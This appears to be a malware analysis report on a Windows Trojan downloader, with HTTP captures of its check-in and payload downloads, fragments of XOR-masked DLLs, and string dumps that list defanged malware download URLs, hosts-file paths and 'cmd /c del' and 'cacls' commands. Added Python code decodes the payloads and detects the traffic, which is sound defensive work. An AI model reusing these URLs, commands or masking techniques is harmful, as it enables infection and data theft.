Cookie: ASPSESSIONIDSCTDRDQA=BCLFJBPCCJAHJJNPNDIDGCMA


HTTP/1.1 200 OK
Date: Sun, 25 Sep 2016 01:28:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 64
Content-Type: text/html
Cache-Control: private
X-Cache: MISS from cache.51cdn.com
X-Via: 1.1 jinh94:2 (Cdn Cache Server V2.0)
Connection: keep-alive
<script>window.location.href='ip.asp?ip=194.242.96.226'</script>


GET /mactj.asp?mac=0050563B0E71&uname=taian HTTP/1.1
User-Agent: vb   wininet
Host: mactj.v138.net


HTTP/1.1 302 Redirct
Connection: Close
Pragma: no-cache
Location: hXXp://mactj.v138.net/mactj.asp?mac=0050563B0E71&uname=taian?bttmfiqeiqqepoar
Cache-control: no-cache
Content-Type: text/html; charset=UTF-8;
Content-Length: 0;


GET /ic.asp HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 1212.ip138.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Connection: keep-alive
Date: Sun, 25 Sep 2016 01:28:56 GMT
Content-Type: text/html
Content-Length: 219
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDSAQSTTRB=BFEOKIHDPKHNBLGOJOJGPKFB; path=/
X-Daa-Tunnel: hop_count=1
<html>..<head>..<meta http-equiv="content-type" content="text/html; charset=gb2312">..<title> ....IP.... </title>..</head>..<body style="margin:0px"><center>....IP....[194.242.96.226] ............</center></body></html>..


GET /osm.dll HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.topyouxi.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 03:39:46 GMT
Content-Length: 84992
Content-Type: application/x-msdownload
Last-Modified: Fri, 20 May 2016 16:37:59 GMT
Accept-Ranges: bytes
ETag: "c1447f8b5b2d11:a652"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 chengdianxin112:6 (Cdn Cache Server V2.0), 1.1 jsycdx41:4 (Cdn Cache Server V2.0)
Connection: keep-alive
/9.20}}}y}}}..}a.c123}}}=}}}}}}abc123}}}}}}}}}}abc123}}}}}}}.}}al|.<
;3.t.\.|1.\)....BA.....]......CSW....]..]92.A..UW.ppwY}}}}}}a.........
.......s...............................0.RZ....}}}}}}}abc123}}}-8}}1|~
a._.e3}}}}}}}.}s@ib723=|}}m}}}..aB.223..}}}y}}}}pbs123.}}y}}}|}}afc123
}}}}my}}m}abc121}}}}}m}}m}abc!23m}}}}}}m}}a&o52.}}}.vy}.}}abc52.v}}}}}
}}}}abc123}}}.qy}q}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}ab
c123}}}}}}}}}}abc123}}}}}}}}}}a73i.3}}}}..}}m}abc123y}}}}}}}}}abc12.}}
.(-%L}}}ab#023..}}G|}}y}abc123}}}}}}}=}}.L.B@P}}}}m}}}}yabm123C|}}}}}}
}}abc12s}}.}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc1
23}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}
}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}
abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123
}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}
}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}ab
c123}}}}}}NSMHa73i.>tsw}....N.a..22.S|}}.~}[.}.x`12\....h....sK.J@^
.[c.e`......4..%.p...u..E..?...m....3}?>..q.Pj...."(%[email protected]
w.....>.l.... ;.D...5.6(#@....Q\.`...'8.k......... ......x.$'...v.w
.......r,.{.{H...E.@.&$...*FRi..Sx.....z1.D....n.Y.a.}.......z.G...i..
>[email protected]....^...<.C...7eXI ..\...t..q.S.`C.t.g..n.U...w...
=.9.<'Tt....,..7 ....~..1.:..DS.. u!...OdP.....:.$<.....0.. ....
.q....&.=u..CM.X..i....q. $....L...]L?T...A.$..C.....].x.wt..V.......(
U...a.....2.y..x..u..W.71.........n-...3.(o.t...j(...b...!<...l

<<< skipped >>>

GET /newcor.dll HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.topyouxi.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 02:34:10 GMT
Content-Length: 369152
Content-Type: application/x-msdownload
Last-Modified: Wed, 21 Sep 2016 02:32:20 GMT
Accept-Ranges: bytes
ETag: "8c18b360b013d21:a652"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc108:6 (Cdn Cache Server V2.0), 1.1 jsycdx41:4 (Cdn Cache Server V2.0)
Connection: keep-alive
/9.20}}}y}}}..}a.c123}}}=}}}}}}abc123}}}}}}}}}}abc123}}}}}}}u|}al|.<
;3.t.\.|1.\)....BA.....]......CSW....]..]92.A..UW.ppwY}}}}}}a.........
.........JY....`.........PY......(.U.....]Y..............eY...........
...aY...............Y............0.RZ....}}}}}}}abc123}}}-8}}1|~a...e3
}}}}}}}.}.@ib;23.x}}m}}}-ea".,23.e}}}c}}}}qbs123.}}x}|}}}}agc023}}}}mc
}}m}abc121}=|}}m}}m}abc!23m}}}}}}m}}a^d/2.}}}.~c}=~}abc/2.~}}}}}}}}}ab
c123}}}.zc}e}}abc123}}}}}}}}}}abc123}}}}}}}}}}aB.,2{}}}}}}}}}}abc123}}
}}}}}}}}abc123}}}}}}}}}}a73i.3}}}}-e}}m}abc123y}}}}}}}}}abc12.}}.(-%L}
}}ab.423.e}}.x}}y}abc123}}}}}}}=}}.L.B@P}}}}m}}}}cabk123.x}}}}}}}}abc1
2s}}.}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}
}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}
abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123
}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}
}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}ab
c123}}}}}}NSMHa73i.>tsw..2.yL....,2..x}}E`}[n}dx`1..7{..>D.W....
.......>;Q.t .:.\..".....1?.......0.X.er.'5_...p.T3..U8.......P.,.l
...N..o...P..3.....v......_W.B.....U...u..QK....pGp..1*<.S..]0..h..
.......Q|.8...?......JP..%[email protected].._. .j'..A....M..
..o_a..i....r.. .A...|!.g#.w.T.=.J.2-. ..;..../...%......"z.n..].=....
i......w... C6@.._hiW..w..Y...k....MS...ti.!.l.PI.......f.O...m.....Uo
w..fp...~>.....^8......&... }...c. _.....Q....~..5~....tWg..&U..:.n
x...(g;D....S.R.%7..=..aN.c'........w.}.?....Bl./(.}....^....2&...

<<< skipped >>>
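The three application/x-msdownload responses above (InsertWnd_2345title_en.dll, osm.dll and newcor.dll) are not plain PE files. Each begins with the same printable run "/9.20}}}y}}}..}a.c123}}}=}}}}}}abc123}}}}}}}}}}abc123...", and that 16-byte period is a repeating-key XOR: zero bytes in a PE header come out as the key itself, which is why "abc123" plus ten '}' (0x7D) bytes repeats through the zero-padded DOS header, and the first two bytes line up with "MZ" (0x4D ^ 'b' = '/', 0x5A ^ 'c' = '9'). The decoder below is an added example, not code from the report or from the sample. It recovers the key by XORing the first 16 ciphertext bytes against the standard DOS header (a known-plaintext attack), unmasks the blob and insists on the MZ and PE signatures before returning. The report truncates the downloads, so the script is exercised on a constructed minimal PE-like image rather than the real DLL; only the key phase and the printed prefix are taken from the capture.

```python
"""Unmask the XOR-obfuscated DLL downloads (added example, not report code)."""
import struct
from typing import Tuple

# The first 32 bytes of a DOS header as emitted by MSVC/VB6-era linkers.
# Everything up to 0x3C is constant in practice; e_lfanew (0x3C..0x3F) varies.
KNOWN_DOS_HEADER = bytes.fromhex(
    "4D5A9000" "03000000" "04000000" "FFFF0000"
    "B8000000" "00000000" "40000000" "00000000"
)
KEY_LEN = 16  # period of the "abc123}}}}}}}}}}" pattern visible in the dump

# The key as it sits at file offset 0 in the captures: zero bytes of the
# plaintext print as the key, so it can be read straight off the dump.
DUMP_KEY = b"bc123" + b"}" * 10 + b"a"

# Printable prefix of the responses as the report renders it
# ('.' = a byte the report could not print).
DUMP_PREFIX = "/9.20}}}y}}}..}a.c123}}}=}}}}}}abc123"


def recover_key(ciphertext: bytes, known_plain: bytes = KNOWN_DOS_HEADER,
                key_len: int = KEY_LEN) -> bytes:
    """Known-plaintext recovery: key[i] = c[i] ^ p[i] over one key period."""
    if len(ciphertext) < key_len or len(known_plain) < key_len:
        raise ValueError("need one full key period of ciphertext and known plaintext")
    return bytes(c ^ p for c, p in zip(ciphertext[:key_len], known_plain[:key_len]))


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; applying it twice restores the input."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_pe(data: bytes) -> bool:
    """MZ at offset 0 and 'PE\\0\\0' at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def decode_payload(ciphertext: bytes) -> Tuple[bytes, bytes]:
    """Recover the key, unmask the blob and refuse anything that is not a PE."""
    key = recover_key(ciphertext)
    plain = xor_with_key(ciphertext, key)
    if not looks_like_pe(plain):
        raise ValueError("decoded data is not a PE image: wrong key or key phase")
    return key, plain


def matches_dump_prefix(blob: bytes, printed: str = DUMP_PREFIX) -> bool:
    """Compare bytes with the report's rendering, where '.' hides an unprintable byte."""
    for b, ch in zip(blob, printed):
        if ch == ".":
            if b != 0x2E and 0x20 <= b < 0x7F:
                return False  # the report would have printed this byte
        elif b != ord(ch):
            return False
    return True


def build_sample_image() -> bytes:
    """Constructed minimal PE-like image (NOT the real DLL): DOS header with
    e_lfanew = 0x40, the PE signature, and some filler."""
    dos = KNOWN_DOS_HEADER + b"\x00" * 28 + struct.pack("<I", 0x40)
    return dos + b"PE\x00\x00" + b"\x00" * 20 + b"filler"


def encode_like_dump(image: bytes) -> bytes:
    """Produce a blob masked the same way as the captured downloads."""
    return xor_with_key(image, DUMP_KEY)


if __name__ == "__main__":
    blob = encode_like_dump(build_sample_image())
    key, plain = decode_payload(blob)
    print("key:", key, "prefix matches dump:", matches_dump_prefix(blob))
    print("decoded:", plain[:2], "PE signature ok:", looks_like_pe(plain))
```

Because the key is read from the first sixteen bytes, the same function handles all three downloads. In the first response the four bytes at 0x3C..0x3F print as "}|}a", which decode to 00 01 00 00, so its PE header sits at 0x100; that is the next thing to verify once the full blob is in hand. If a file is not a PE from byte 0 (a length prefix, for instance), the known plaintext no longer lines up and the signature check fails loudly instead of handing back garbage.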

GET /homepro.txt HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.topyouxi.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 03:41:19 GMT
Content-Length: 161
Content-Type: text/plain
Last-Modified: Tue, 22 Mar 2016 02:07:56 GMT
Accept-Ranges: bytes
ETag: "ecd3da6df83d11:a4e7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc108:0 (Cdn Cache Server V2.0), 1.1 jsycdx41:4 (Cdn Cache Server V2.0)
Connection: keep-alive
[email protected]@[email protected]@liebao.exe@sogouexplo
[email protected]@[email protected]@krbrowser.exe@max
[email protected]
....



GET /urlRemote.txt HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.topyouxi.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 01:38:17 GMT
Content-Length: 100
Content-Type: text/plain
Last-Modified: Mon, 01 Aug 2016 06:38:16 GMT
Accept-Ranges: bytes
ETag: "48361949bfebd11:a4f3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc108:6 (Cdn Cache Server V2.0), 1.1 jsycdx41:4 (Cdn Cache Server V2.0)
Connection: keep-alive
[Config]..count=1..[url1]..name=url1..url=cpro.baidustatic.com/aj/static/sync.html?t=1469895477099..
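Most of the .txt task lists pulled from yxtt.v138.net and VVV.topyouxi.net above share one tiny format: one record per CRLF line (rendered as ".." in the dump), fields separated by '^', with empty fields as positional padding; homepro.txt and jwico.txt use '@' instead, and urlRemote.txt is an INI fragment. The extractor below is an added example, not part of the report, that turns those lists into indicator buckets (hosts, URLs, process names, bare file names) by shape alone. The excerpts embedded in it are copied from the responses above with ".." restored to CRLF and the report's defanging (hXXp, VVV.) kept, so refang() undoes it for a blocklist; the meaning of the numeric fields ("3^10", "800002", the InsertWnd geometry tuples) is not documented on the page and is deliberately not guessed.

```python
"""Extract indicators from the caret-delimited task lists (added example)."""
import re
from typing import Dict, List, Optional, Set, Tuple

HOST_RE = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$", re.I)
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
FILE_EXTS = {"js", "htm", "html", "txt", "dll", "asp"}  # bare file names seen in the lists


def refang(s: str) -> str:
    """Undo the report's defanging (hXXp -> http, VVV. -> www.)."""
    return s.replace("hXXp", "http").replace("VVV.", "www.")


def parse_caret_file(text: str) -> List[List[str]]:
    """One record per CRLF line ('..' in the report), fields split on '^'.
    Empty fields are positional padding and are dropped."""
    records = []
    for line in text.replace("\r\n", "\n").split("\n"):
        fields = [f for f in line.split("^") if f]
        if fields:
            records.append(fields)
    return records


def parse_at_list(text: str) -> List[str]:
    """homepro.txt / jwico.txt style: tokens separated by '@'."""
    return [t for t in text.split("@") if t]


def classify(token: str) -> Optional[Tuple[str, str]]:
    """Map one field to (kind, value) by shape only; numeric codes return None."""
    t = refang(token.strip())
    if t.lower().startswith(("http://", "https://")):
        return "url", t
    if t.lower().endswith(".exe"):
        name = t.replace("/", "\\").split("\\")[-1].lstrip("*")
        return "process", name.lower()
    host = re.split(r"[:/]", t.lstrip("."), maxsplit=1)[0]  # '.example.cn/path' -> example.cn
    if host.rsplit(".", 1)[-1].lower() in FILE_EXTS:
        return "file", t
    if IPV4_RE.match(host) or HOST_RE.match(host):
        return "host", host.lower()
    return None


def extract_iocs(records: List[List[str]]) -> Dict[str, Set[str]]:
    """Bucket every field of every record; URLs also contribute their host."""
    out: Dict[str, Set[str]] = {"host": set(), "url": set(), "process": set(), "file": set()}
    for rec in records:
        for field in rec:
            hit = classify(field)
            if hit:
                out[hit[0]].add(hit[1])
    for url in list(out["url"]):
        out["host"].add(re.split(r"[:/]", url.split("://", 1)[1], maxsplit=1)[0].lower())
    return out


# Excerpts copied from the responses above, '..' restored to CRLF.
JZURL_EXCERPT = (
    "^^.16mncr5.cn/2016/^hXXp://VVV.168wm.net/jzurljc/index.htm^3^10\r\n"
    "^^121.40.32.124:^hXXp://VVV.168wm.net/jzurljc/index.htm^3^10\r\n"
)
JZYXJ_EXCERPT = "dev.tg.wan.360.cn^^^800002\r\n183.61.162.85^^^800002\r\n"
JSLIST_EXCERPT = (
    "mm131.com^^^hzuser@servce@hnrw@wskh^0^ietc.js\r\n"
    "mp.weixin.qq.com/s?^^^hzuser@servce@hnrw@wskh^0^ietc.js\r\n"
)
JZJC_EXCERPT = "tgp_render.exe^\r\n\\qq.exe^\r\nsvchost.exe^\r\n"
HOMEPRO_EXCERPT = "liebao.exe@krbrowser.exe"  # the two homepro.txt tokens left legible


def collect_all() -> Dict[str, Set[str]]:
    records: List[List[str]] = []
    for text in (JZURL_EXCERPT, JZYXJ_EXCERPT, JSLIST_EXCERPT, JZJC_EXCERPT):
        records.extend(parse_caret_file(text))
    records.append(parse_at_list(HOMEPRO_EXCERPT))
    return extract_iocs(records)


if __name__ == "__main__":
    for kind, values in collect_all().items():
        print(f"{kind}: {sorted(values)}")
```

The process bucket is worth reading on its own: jzjc.txt and homepro.txt are lists of browser and game-launcher executables, the same class of names that appears in the InsertWnd.txt window-class entries (360se6_Frame, Chrome_WidgetWin_1, MozillaWindowClass, IEFrame), so the lists describe where the sample intends to act rather than what it downloads. Treat the host bucket as candidate indicators only; some entries (mp.weixin.qq.com, VVV.4399.com) are legitimate sites the sample targets, not infrastructure it controls.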


GET /mactj.asp?mac=0050563B0E71&uname=taian?bttmfiqeiqqepoar HTTP/1.1
User-Agent: vb   wininet
Host: mactj.v138.net
Connection: Keep-Alive


HTTP/1.1 302 Redirct
Connection: Close
Pragma: no-cache
Location: hXXp://mactj.v138.net/mactj.asp?mac=0050563B0E71&uname=taian
Cache-control: no-cache
Content-Type: text/html; charset=UTF-8;
Content-Length: 0;
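The two mactj.asp exchanges above are the sample's check-in: it sends the adapter MAC and the Windows user name in the query string, with the distinctive user agent "vb   wininet" (three spaces), and the server bounces it through a 302 that appends a random token and then a 302 back. Together with the "RookIE/1.0" agent used for ip.asp and jwico.txt and the task-list hosts, that is enough to write a proxy-log detection. The scanner below is an added example, not part of the report; the log layout ("<ts> <client> <method> <url> \"<ua>\"") is an assumption, and the log lines are constructed to mirror the requests above, not taken from any real proxy.

```python
"""Flag the sample's check-in and task-list traffic in proxy logs (added example)."""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Taken from the captures above (VVV. refanged to www.).
BEACON_USER_AGENTS = {"vb   wininet", "RookIE/1.0"}  # note the three spaces
TASK_HOSTS = {
    "yxtt.v138.net", "mactj.v138.net", "www.yswm.net",
    "www.topyouxi.net", "123.1313k.net", "www.168wm.net",
}
MAC_RE = re.compile(r"^[0-9A-Fa-f]{12}$")

# Assumed log layout (not from the page): "<ts> <client> <method> <url> \"<ua>\"".
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) "(?P<ua>[^"]*)"$'
)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    m = LOG_RE.match(line.rstrip("\r\n"))
    return m.groupdict() if m else None


def check(entry: Dict[str, str]) -> List[str]:
    """Return the reasons an entry is suspicious (empty list = clean)."""
    reasons: List[str] = []
    parts = urlsplit(entry["url"])
    host = (parts.hostname or "").lower()
    if entry["ua"] in BEACON_USER_AGENTS:
        reasons.append(f"beacon user-agent {entry['ua']!r}")
    if host in TASK_HOSTS:
        reasons.append(f"known task/check-in host {host}")
    qs = parse_qs(parts.query, keep_blank_values=True)
    mac = qs.get("mac", [""])[0]
    if MAC_RE.match(mac) and "uname" in qs:
        # mactj.asp?mac=<adapter MAC>&uname=<Windows user>: host identity leaking out
        reasons.append(f"mac/uname check-in mac={mac} uname={qs['uname'][0]}")
    return reasons


def scan(log_text: str) -> List[Dict[str, object]]:
    alerts: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = check(entry)
        if reasons:
            alerts.append({"client": entry["client"], "url": entry["url"], "reasons": reasons})
    return alerts


# Constructed log lines mirroring the requests above; not a real proxy log.
SAMPLE_LOG = """\
1474766909.100 10.0.0.7 GET http://mactj.v138.net/mactj.asp?mac=0050563B0E71&uname=taian "vb   wininet"
1474766922.300 10.0.0.7 GET http://www.yswm.net/ip.asp "RookIE/1.0"
1474766930.900 10.0.0.7 GET http://yxtt.v138.net/send/newDomain.txt "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
1474766940.000 10.0.0.9 GET http://www.example.com/index.html "Mozilla/5.0 (Windows NT 6.1) Firefox/48.0"
"""

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert["client"], alert["url"])
        for reason in alert["reasons"]:
            print("   -", reason)
```

Two caveats for anyone turning this into a rule. The MAC in the capture, 00:50:56:3B:0E:71, starts with a VMware OUI, so it identifies the sandbox's virtual adapter rather than the campaign; key on the parameter shape and the user agents, not on that value. And the MSIE 6.0 user agent the downloader uses for the task lists is far too common to alert on by itself; it only carries weight in combination with the host.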


The Trojan connects to the servers at the following location(s):

Strings from Dumps
%original file name%.exe_516:

`.rsrc
).ri#
}8!"###"!
!oOZ
vb6chs.dll
RunExeModel
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
D:\drivers\
\olelib.tlb
DeleteUrlCacheEntryA
F%System%\stdole2.tlb
epldrive.dll
mksparse.dll
DiskVolume.dll
oleaut32.dll
shell32.dll
winmm.dll
CreatePipe
ntdll.dll
%System%\msvbvm60.dll\3
VBA6.DLL
URLMON.DLL
URLDownloadToFileA
.text
`.data
.rsrc
.reloc
MSWNSK98.chm
hhctrl.ocx
CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32
MSWINSCK.OCX
"255.255.255.255
"6.00.8169
WSOCK32.dll
KERNEL32.dll
USER32.dll
ole32.dll
ADVAPI32.dll
OLEAUT32.dll
GDI32.dll
GetProcessHeap
GetWindowsDirectoryA
GetKeyState
CreateDialogIndirectParamA
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyA
GetViewportExtEx
SetViewportExtEx
SetViewportOrgEx
"%s%s.DLL
%s%s.DLL
%u\%s.dll
{lX-X-X-XX-XXXXXX}
CLSID\%s
%s Object
%s.%s.%ld
%s.%s
%s.%s\CurVer
%s\InprocServer
VERSION.DLL
%ld - %s
stdole2.tlbWWW
hsckTCPProtocolWW
FsckUDPProtocolWWd
}|RemotePortWWd
7LocalPortWWWd
0ZBsckGetNotSupportedWW
sckSetNotSupportedWW
sckUnsupportedWW
sckMsgTooBig
sckPortNotSupportedW
MSWinSck.OcxWW
MSWNSK98.chmWW
TCP protocolWW
UDP protocolWW
Returns/Sets the port to be connected to on the remote computerWWW0
Returns/Sets the port used on the local computerWW*
Binds socket to specific port and adapterW:
Occurs connect operation is completedW4
Occurs after a send operation has completedWWW
The argument passed to a function was not in the correct format or in the specified rangeW
Unsupported variant typesW"
Invalid operation at current state
The operation is canceledW
Socket is non-blocking and the specified operation will blockW 
A blocking winsock operation is in progressWWWA
The operation is completed. No blocking operation is in progress.W
The specified port is not supportedWWW
?$?0?6?<?
4'484%5-5
mswinsck.dbg
=VVV.verisign.com/repository/CPS Incorp. by Ref.,LIAB.LTD(c)961>0<
'hXXps://VVV.verisign.com/repository/CPS
This certificate incorporates by reference, and its use is strictly
subject to, the VeriSign Certification Practice Statement (CPS)
hXXps://VVV.verisign.com; by E-mail at [email protected]; or
USA Copyright (c)1996 VeriSign, Inc. All Rights Reserved. CERTAIN
WARNING: THE USE OF THIS CERTIFICATE IS STRICTLY SUBJECT TO THE
VERISIGN CERTIFICATION PRACTICE STATEMENT. THE ISSUING AUTHORITY
DISCLAIMS CERTAIN IMPLIED AND EXPRESS WARRANTIES, INCLUDING WARRANTIES
BE LIABLE FOR CONSEQUENTIAL, PUNITIVE, AND CERTAIN OTHER DAMAGES. SEE
4hXXps://VVV.verisign.com/repository/verisignlogo.gif0
hXXps://VVV.verisign.com/CPS0b
hXXp://VVV.microsoft.com/vbasic 0
Bo.pS
|%F~":
J.wxn
kEyH
9/}Cmd
UrlW
DownUrlW
BakUrlWW
KERNEL32.DLL
MSVBVM60.DLL
USER32.DLL
P2P.dll
\notepad.vbp
hXXp://VVV.pc918.net/file.txt
hXXp://VVV.yswm.net/file.txt
hXXp://VVV.v138.net/file.txt
hXXp://VVV.v345.net/file.txt
hXXp://VVV.ahwm.net/file.txt
~DFA1039.tmp
\Set.dat
\win.ini
\sys.dat
\system32\mswinsck.ocx
\set.ini
hXXp://user.yswm.net/yswm/
hXXp://user.yswm.net/so118/
hide.exe
\system32\svchost.exe
DownUrl
yswm.runsoft
eWindowStyle
Hotkey
\Addico.ico
The specified file is either a named or anonymous pipe
WScript.Shell
2c49f800-c2dd-11cf-9ad6-0080c7e7b78d
RemotePort
LocalPort
YThe argument passed to a function was not in the correct format or in the specified range
6.00.8169
is a registered trademark of Microsoft Corporation. Windows(tm) is a trademark of Microsoft Corporation.
&LocalPort
Socket has encountered an error:Returns/Sets the name used to identify the remote computer?Returns/Sets the port to be connected to on the remote computer0Returns/Sets the port used on the local computer*Returns the state of the socket connection7Returns the number of bytes received on this connection
TCP protocol
UDP protocol
Error occurred;Occurs when data has been received from the remote computer%Occurs connect operation is completed4Occurs when a remote client is attempting to connect*Occurs when the connection has been closed%Occurs during process of sending data Occurs after a send operation has completed
Protocol Constants)Binds socket to specific port and adapter
Unsupported variant types
"Invalid operation at current state
Invalid type for %s property,%s property should be in the range %ld - %ld
The operation is canceled
=Socket is non-blocking and the specified operation will block A blocking winsock operation is in progressAThe operation is completed. No blocking operation is in progress.
Destination address is requiredAThe datagram is too large to fit into the buffer and is truncated3The specified port is the wrong type of this socket
Option unknown, or unsupported#The specified port is not supported0Socket type not supported in this address family>Socket is not a type that supports connection oriented service
Protocol family not supported
Address Family is not supported
Network subsystem is unavailable WINSOCK.DLL version out of range"WinsockInit should be called first

%original file name%.exe_516_rwx_00401000_00038000:

(strings identical to the %original file name%.exe_516 dump above)

%original file name%.exe_516_rwx_018C1000_0003E000:

VB5!6&vb6chs.dll
GetWebSoure
%System%\msvbvm60.dll\3
epldrive.dll
mksparse.dll
DiskVolume.dll
urlmon
URLDownloadToFileA
oleaut32.dll
shell32.dll
psapi.dll
CreatePipe
WSOCK32.DLL
wininet.dll
InternetOpenUrlA
DeleteUrlCacheEntryA
kernel32.dll
VBA6.DLL
advapi32.dll
RegOpenKeyA
RegOpenKeyExA
RegCloseKey
RegCreateKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyA
ntdll.dll
.rsrc
yslm.dll
.text
.data
612121212121
vb6chs.dll
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
`.data
@.reloc
D:\drivers\
hXXp://user.yswm.net/yswm/
hXXp://user.yswm.net/so118/
noweb
\win.ini
\lkfdf\WmiPreSe.exe
cmd /c start
\073.exe
\sys.dll
cmd /c del /s
user.yswm.net
%System%\drivers\etc\Hosts
%System%\drivers\etc\Hosts.txt
\iesafe.dll
\E-yoo\EyooSechelper2.dll
cmd /c cacls
%Documents and Settings%\%current user%inistrator\
8.8.8.8
hXXp://yxtt.v138.net/send/jwclose/kill.txt
hXXp://VVV.v138.net/ycdel.asp?action=ser&username=
wb2014.oicp.net
hXXp://VVV.yswm.net/ycdel.asp?action=ser&username=wenhua-
liuyingkyu.eicp.net
~DFA1039.tmp
[email protected]
hXXp://yxtt.v138.net/send/jwclose/app.txt
hXXp://down.v718.com/073.exe
hXXp://down.v718.com/svchost.exe
\xcfde.exe
hXXp://down.v718.com/666.exe
hXXp://yxtt.v138.net/send/jwclose/qqtang.txt
hXXp://down06.gdicoou.com:5505/updata/adclient/client/2921ico.exe
hXXp://down.v718.com/qqtang.exe
\1599.exe
\1671.exe
hXXp://down.v718.com/1671.exe
\1150.exe
\1600.exe
\1672.exe
\1655.exe
\szicoad.exe
hXXp://down06.gdicoou.com:5505/updata/adclient/client/2920ico.exe
hXXp://down.v718.com/apphftts.exe
hXXp://down.v718.com/appinst.exe
hXXp://down.v718.com/niulock.exe
flash.exe
hXXp://down.v718.com/remove.exe
hXXp://down.v718.com/hook.dll
\system32\browse1c.dllbak
\system32\browse1c.dll
hXXp://mactj.v138.net/mactj.asp?mac=
223.244.230.186
hXXp://yxtt.v138.net/send/jwclose/yswm.txt
hXXp://down.v718.com/addjc.dll
ystb.Favorites
conime.exe
hXXp://VVV.topyouxi.net/newcor.dll
hXXp://down.v718.com/exitpop.dll
yswm.gamepop
hXXp://down.v718.com/ico.dll
yswm.ico
lockie.ini
JianGuanUrl
webfile
\system\lock.dat
\system32\gdi30.dll
\system32\lockie.ini
hXXp://down.v718.com/lock.dll
hXXp://down.v718.com/lock.exe
hXXp://down.v718.com/lock2.exe
yszy.lockie
config.ini
hXXp://down.v718.com/hbxzctp.exe
hXXp://down.v718.com/sgtp.exe
hXXp://down.v718.com/sgtp2.exe
hXXp://VVV.yswm.net/ip.asp
hXXp://iframe.ip138.com/ic.asp
The specified file is either a named or anonymous pipe
Cookies\*.*
ids.exe
-url:http:
minie.exe
anhui-000001.exe
netbar.exe
